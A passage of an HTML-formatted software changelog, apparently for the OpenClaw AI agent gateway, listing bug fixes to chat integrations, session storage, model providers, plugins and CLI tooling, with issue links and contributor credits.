<li>Telegram: honor runtime conversation bindings for native slash commands in bound top-level groups, so commands like <code>/status@bot</code> route to the active non-<code>main</code> session instead of falling back to the default route. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362659532" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75405" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75405/hovercard" href="https://github.com/openclaw/openclaw/issues/75405">#75405</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363728120" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75558" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75558/hovercard" href="https://github.com/openclaw/openclaw/pull/75558">#75558</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ziptbm/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ziptbm">@ziptbm</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yfge/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yfge">@yfge</a>.</li>
<li>Gateway/tasks: make task registry maintenance use pass-local backing-session lookups and fresh active child-session indexes, avoiding repeated full task snapshots and session-store clones on large stale registries. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342683931" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73517" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73517/hovercard" href="https://github.com/openclaw/openclaw/issues/73517">#73517</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365145364" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75708" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75708/hovercard" href="https://github.com/openclaw/openclaw/issues/75708">#75708</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351414705" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74406" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74406/hovercard" href="https://github.com/openclaw/openclaw/pull/74406">#74406</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365146597" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75709" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75709/hovercard" href="https://github.com/openclaw/openclaw/pull/75709">#75709</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lightningxxl/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lightningxxl">@Lightningxxl</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/glfruit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/glfruit">@glfruit</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jared-rebel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jared-rebel">@jared-rebel</a>.</li>
<li>Auth/sessions: JSON-clone auth-profile cache/runtime snapshots and remaining session cleanup previews instead of using <code>structuredClone</code>, preserving mutation isolation while avoiding native-memory growth on large stores. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4073238042" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/45438" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/45438/hovercard" href="https://github.com/openclaw/openclaw/issues/45438">#45438</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/markus-lassfolk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/markus-lassfolk">@markus-lassfolk</a>.</li>
<li>Models CLI: restore <code>openclaw models list --provider &lt;id&gt;</code> catalog and registry fallback rows for unconfigured providers, so provider-specific verification commands no longer report "No models found." Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363447158" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75517" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75517/hovercard" href="https://github.com/openclaw/openclaw/issues/75517">#75517</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4364131001" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75615" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75615/hovercard" href="https://github.com/openclaw/openclaw/pull/75615">#75615</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lotsoftick/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lotsoftick">@lotsoftick</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/koshaji/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/koshaji">@koshaji</a>.</li>
<li>Gateway/macOS: write LaunchAgent services with a canonical system PATH and stop preserving old plist PATH entries, so Volta, asdf, fnm, and pnpm shell paths no longer affect gateway child-process Node resolution. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360722639" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75233" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75233/hovercard" href="https://github.com/openclaw/openclaw/issues/75233">#75233</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360954515" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75246" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75246/hovercard" href="https://github.com/openclaw/openclaw/pull/75246">#75246</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nphyde2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nphyde2">@nphyde2</a>.</li>
<li>Slack/hooks: preserve bot alert attachment text in message-received hook content when command text is blank. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368641515" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76035" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76035/hovercard" href="https://github.com/openclaw/openclaw/issues/76035">#76035</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368643379" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76036" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76036/hovercard" href="https://github.com/openclaw/openclaw/pull/76036">#76036</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amsminn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amsminn">@amsminn</a>.</li>
<li>Sessions/agents: route Gateway session-store writes, CLI cleanup maintenance, and agent-delete session purges through a dedicated in-process writer and borrow the validated mutable cache during the writer slot, avoiding runtime file locks plus repeated <code>sessions.json</code> rereads and JSON clones on hot metadata updates. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4288028893" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68554" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68554/hovercard" href="https://github.com/openclaw/openclaw/pull/68554">#68554</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/henkterharmsel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/henkterharmsel">@henkterharmsel</a>.</li>
<li>Memory/markdown: replace CRLF managed blocks in place and collapse duplicate marker blocks without rewriting unmanaged markdown, so Dreaming and Memory Wiki files self-heal from repeated generated sections. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363293115" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75491" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75491/hovercard" href="https://github.com/openclaw/openclaw/issues/75491">#75491</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363308439" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75495" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75495/hovercard" href="https://github.com/openclaw/openclaw/pull/75495">#75495</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4366593323" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75810" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75810/hovercard" href="https://github.com/openclaw/openclaw/pull/75810">#75810</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368473075" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76008" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76008/hovercard" href="https://github.com/openclaw/openclaw/pull/76008">#76008</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/asaenokkostya-coder/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/asaenokkostya-coder">@asaenokkostya-coder</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ottodeng/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ottodeng">@ottodeng</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/everettjf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/everettjf">@everettjf</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lrg913427-dot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lrg913427-dot">@lrg913427-dot</a>.</li>
<li>Agents/tools: return critical tool-loop circuit-breaker stops as blocked tool results instead of thrown tool failures, so models see the guardrail and stop retrying the same call. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rayraiser/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rayraiser">@rayraiser</a>.</li>
<li>Agents/sessions: preserve pre-existing runtime model and context window after heartbeat turns so a per-run heartbeat model override does not bleed into shared-session status. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363070391" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75452" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75452/hovercard" href="https://github.com/openclaw/openclaw/issues/75452">#75452</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhangguiping-xydt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhangguiping-xydt">@zhangguiping-xydt</a>.</li>
<li>Model commands: clarify direct and inline <code>/model</code> acknowledgements for non-default selections as session-scoped. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/addu2612/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/addu2612">@addu2612</a>.</li>
<li>Doctor/gateway: stop warning that non-existent, unconfigured user-bin directories are required in the Gateway service PATH. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368545711" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76017" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76017/hovercard" href="https://github.com/openclaw/openclaw/issues/76017">#76017</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/xiphis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xiphis">@xiphis</a>.</li>
<li>TUI/setup: skip full provider model normalization during context-window warmup and bound Terminal hatch bootstrap provider requests, avoiding cold-start stalls with large model registries and first-run hatching stuck behind the watchdog. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4369916791" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76241" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76241/hovercard" href="https://github.com/openclaw/openclaw/pull/76241">#76241</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/547895019/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/547895019">@547895019</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</li>
<li>Agents: enable malformed tool-call argument repair for Codex and Azure OpenAI Responses transports while keeping generic OpenAI Responses paths out of the repair gate. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4359521991" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75154" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75154/hovercard" href="https://github.com/openclaw/openclaw/issues/75154">#75154</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nimraakram22/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nimraakram22">@Nimraakram22</a>.</li>
<li>Memory Wiki: accept relative Markdown links that include the <code>.md</code> suffix during broken-wikilink validation, avoiding false positives for native render-mode links. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Kenneth8128/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Kenneth8128">@Kenneth8128</a>.</li>
<li>OpenAI Codex: show the device-pairing code in the interactive SSH/headless prompt while keeping the short-lived code out of persistent runtime logs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348981712" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74212" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74212/hovercard" href="https://github.com/openclaw/openclaw/issues/74212">#74212</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/da22le123/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/da22le123">@da22le123</a>.</li>
<li>QA Lab: stop gateway children when the suite parent disappears, so interrupted local QA runs cannot leave hot orphaned gateways behind.</li>
<li>Codex/app-server/plugins: tolerate second connection closes during startup recovery, include retry counts plus stringified restart errors, and allow the official npm Codex plugin to install without the unsafe-install override while keeping <code>/codex</code> command ownership and covering the real npm Docker live path through managed <code>.openclaw/npm</code> dependencies plus uninstall failure proof.</li>
<li>Plugins/CLI: cache plugin CLI registration entries per command program so completion state generation does not repeat the full plugin sweep in one invocation. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ScientificProgrammer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ScientificProgrammer">@ScientificProgrammer</a>.</li>
<li>Plugins: reuse gateway-bindable plugin loader cache entries for later default-mode loads without serving default-built registries to gateway-bound requests, reducing repeated plugin registration during dispatch. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4210492312" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61756" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61756/hovercard" href="https://github.com/openclaw/openclaw/issues/61756">#61756</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DmitryPogodaev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DmitryPogodaev">@DmitryPogodaev</a>.</li>
<li>Gateway/secrets: include the caught error message in <code>secrets.reload</code> and <code>secrets.resolve</code> warning logs while keeping RPC errors generic, so operators can diagnose reload and permission failures. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/davidangularme/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/davidangularme">@davidangularme</a>.</li>
<li>Providers/OpenRouter/LM Studio/Anthropic: fill DeepSeek V4 <code>reasoning_content</code> replay placeholders for <code>openrouter/deepseek/deepseek-v4-flash</code> and <code>openrouter/deepseek/deepseek-v4-pro</code>, normalize binary LM Studio reasoning metadata from Gemma 4 and other local models, and recover Anthropic-compatible stream text deltas that arrive before their matching content block. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368552053" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76018" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76018/hovercard" href="https://github.com/openclaw/openclaw/issues/76018">#76018</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368472046" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76007" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76007/hovercard" href="https://github.com/openclaw/openclaw/issues/76007">#76007</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cloph-dsp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cloph-dsp">@cloph-dsp</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vliuyt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vliuyt">@vliuyt</a>.</li>
<li>fix(infra): block workspace state-directory env override [AI]. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367841633" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75940" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75940/hovercard" href="https://github.com/openclaw/openclaw/pull/75940">#75940</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</li>
<li>MCP/OpenAI and media: normalize parameter-free MCP tool schemas before OpenAI tool submission, honor explicit short <code>[[tts:text]]...[[/tts:text]]</code> blocks while keeping untagged short auto-TTS suppressed, and accept home-relative <code>MEDIA:~/...</code> attachment paths under the existing file-read policy. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362431372" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75362" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75362/hovercard" href="https://github.com/openclaw/openclaw/issues/75362">#75362</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345594550" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73758" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73758/hovercard" href="https://github.com/openclaw/openclaw/issues/73758">#73758</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346056562" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73796" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73796/hovercard" href="https://github.com/openclaw/openclaw/issues/73796">#73796</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tolkonepiu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tolkonepiu">@tolkonepiu</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SymbolStar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SymbolStar">@SymbolStar</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yfge/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yfge">@yfge</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fabkury/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fabkury">@fabkury</a>.</li>
<li>Hooks/doctor: warn when <code>hooks.transformsDir</code> points outside the canonical hooks transform directory, so invalid workspace skill paths get a direct recovery hint before the Gateway crash-loops. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367117797" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75853" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75853/hovercard" href="https://github.com/openclaw/openclaw/issues/75853">#75853</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/midobk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/midobk">@midobk</a>.</li>
<li>Proxy/audio: convert standard <code>FormData</code> bodies before proxy-backed undici fetches, so audio transcription and multipart uploads no longer send <code>[object FormData]</code> when <code>HTTP_PROXY</code> or <code>HTTPS_PROXY</code> is configured. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4085311223" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48554" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/48554/hovercard" href="https://github.com/openclaw/openclaw/issues/48554">#48554</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dco5/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dco5">@dco5</a>.</li>
<li>Discord/setup/startup/native commands: write resolved guild/channel allowlist selections to the selected guild and channel, persist slash-command deploy hashes across process restarts, treat abort-time Carbon reconnect-exhausted events as expected shutdown during stale-socket restarts, allow explicit ack reactions in tool-only guild channels, and warn when slash dispatch or direct plugin execution produces no visible reply. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355990759" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74922" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74922/hovercard" href="https://github.com/openclaw/openclaw/issues/74922">#74922</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4186301600" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58986" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58986/hovercard" href="https://github.com/openclaw/openclaw/issues/58986">#58986</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4176861539" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58216" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/58216/hovercard" href="https://github.com/openclaw/openclaw/pull/58216">#58216</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4079837629" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/47788" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/47788/hovercard" href="https://github.com/openclaw/openclaw/pull/47788">#47788</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347363347" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73949" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73949/hovercard" href="https://github.com/openclaw/openclaw/pull/73949">#73949</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4213236198" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62057" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/62057/hovercard" href="https://github.com/openclaw/openclaw/pull/62057">#62057</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/samvilian/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/samvilian">@samvilian</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BlueBirdBack/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BlueBirdBack">@BlueBirdBack</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Eldersonar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Eldersonar">@Eldersonar</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Perttulands/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Perttulands">@Perttulands</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jb510/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jb510">@jb510</a>.</li>
<li>Discord/delivery/media: use session-backed A2A announce target lookup for multi-account <code>sessions_send</code>, keep typing indicators alive during long tool runs and auto-compaction, preserve multipart Content-Type headers for uploads, preserve attachment and sticker filenames, and keep non-ASCII channel names in session labels while preserving ASCII-slug allowlists. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4055175543" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42652" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/42652/hovercard" href="https://github.com/openclaw/openclaw/issues/42652">#42652</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4195120978" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59744" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59744/hovercard" href="https://github.com/openclaw/openclaw/issues/59744">#59744</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4112523352" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51626" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51626/hovercard" href="https://github.com/openclaw/openclaw/issues/51626">#51626</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4069301815" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44773" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/44773/hovercard" href="https://github.com/openclaw/openclaw/pull/44773">#44773</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347442555" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73975" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73975/hovercard" href="https://github.com/openclaw/openclaw/pull/73975">#73975</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/irchelper/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/irchelper">@irchelper</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dpalfox/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dpalfox">@dpalfox</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lanfei/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lanfei">@Lanfei</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Squirbie/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Squirbie">@Squirbie</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/FunJim/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/FunJim">@FunJim</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xela92/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xela92">@xela92</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rockcent/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rockcent">@rockcent</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/swjeong9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/swjeong9">@swjeong9</a>.</li>
<li>Discord/threads/PluralKit: canonicalize proxied webhook turns to the original message id for dedupe, inject thread starter context only on the first effective thread turn, and resolve thread <code>ownerId</code>/<code>parentId</code> from Discord API-style snake_case payload fields so bot-owned autoThreads do not require unnecessary mentions. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4047195697" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/41355" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/41355/hovercard" href="https://github.com/openclaw/openclaw/issues/41355">#41355</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4067889287" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44447" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44447/hovercard" href="https://github.com/openclaw/openclaw/issues/44447">#44447</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4067894290" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44449" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44449/hovercard" href="https://github.com/openclaw/openclaw/issues/44449">#44449</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/acgh213/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/acgh213">@acgh213</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/p3nchan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/p3nchan">@p3nchan</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mgh3326/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" 